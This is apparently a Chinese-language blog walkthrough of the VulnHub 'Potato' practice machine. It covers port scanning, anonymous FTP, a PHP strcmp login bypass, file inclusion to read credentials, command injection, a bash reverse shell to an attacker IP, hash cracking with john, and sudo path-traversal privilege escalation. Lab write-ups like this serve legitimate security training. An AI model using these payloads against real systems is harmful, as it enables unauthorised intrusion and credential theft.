VulnHub - Potato

VulnHub - Potato

涉及方法


  • php strcmp 绕过
  • LFI
  • 命令注入
  • 密码爆破

信息收集


端口扫描


Port Service Version
22/tcp ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp http Apache httpd 2.4.41 ((Ubuntu))
2112/tcp ftp ProFTPD 

1
2
3
4
5
6
7
8
9
10
11
12
13
PORT     STATE SERVICE VERSION 
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 
| ssh-hostkey:  
|   3072 ef:24:0e:ab:d2:b3:16:b4:4b:2e:27:c0:5f:48:79:8b (RSA) 
|   256 f2:d8:35:3f:49:59:85:85:07:e6:a2:0e:65:7a:8c:4b (ECDSA) 
|_  256 0b:23:89:c3:c0:26:d5:64:5e:93:b7:ba:f5:14:7f:3e (ED25519) 
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu)) 
|_http-server-header: Apache/2.4.41 (Ubuntu) 
|_http-title: Potato company 
2112/tcp open  ftp     ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230) 
| -rw-r--r--   1 ftp      ftp           901 Aug  2  2020 index.php.bak 
|_-rw-r--r--   1 ftp      ftp            54 Aug  2  2020 welcome.msg

Web路径枚举


1
dirsearch -u "http://192.168.0.106" -t 60 -e * -x 404,403 --json-report report/output/dirsearch_out.json

full_2021-04-26-19-26-10


需要凭证登录


FTP 枚举


full_2021-04-26-20-42-57


1
2
-rw-r--r--   1 ftp      ftp           901 Aug  2  2020 index.php.bak 
-rw-r--r--   1 ftp      ftp            54 Aug  2  2020 welcome.msg

关键内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php

$pass= "potato"; //note Change this password regularly

if($_GET['login']==="1"){
  if (strcmp($_POST['username'], "admin") == 0  && strcmp($_POST['password'], $pass) == 0) {
    echo "Welcome! </br> Go to the <a href=\"dashboard.php\">dashboard</a>";
    setcookie('pass', $pass, time() + 365*24*3600);
  }else{
    echo "<p>Bad login/password! </br> Return to the <a href=\"index.php\">login page</a> <p>";
  }
  exit();
}
?>

strcmp 绕过


PHP strcmp 存在绕过:PHP strcmp Bypass (ABCTF2016 – L33t H4xx0r)

1
username=admin&password[]=""

full_2021-04-26-21-46-55

full_2021-04-26-21-47-16


LFI 读取凭证


full_2021-04-26-21-54-49


得到 webadmin 的凭证

1
webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6/:1001:1001:webadmin,,,:/home/webadmin:/bin/bash

命令注入


full_2021-04-28-16-48-25


Reverse Shell


1
bash -c 'exec bash -i &>/dev/tcp/192.168.0.108/8848 <&1'

full_2021-04-28-16-54-25


密码爆破


1
2
3
john passwd -w /usr/share/wordlists/rockyou.txt

john --format=md5crypt -w /usr/share/wordlists/rockyou.txt passwd

passwd

login


后渗透


信息收集


.bash_history


bash_history


敏感信息

1
2
3
4
sudo -l 

sudo /bin/nice /root/notes/
sudo /bin/nice /root/notes/*

提权


1
2
3
4
5
sudo -l

 
User webadmin may run the following commands on serv: 
    (ALL : ALL) /bin/nice /notes/*

sudo -l


1
/bin/nice /notes/*

限定路径:/notes/*


ls -alh


id.sh


1
2
3
echo "/bin/bash -p" > bash.sh 

sudo /bin/nice /notes/../home/webadmin/bash.sh

root


root.txt

VulnHub

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!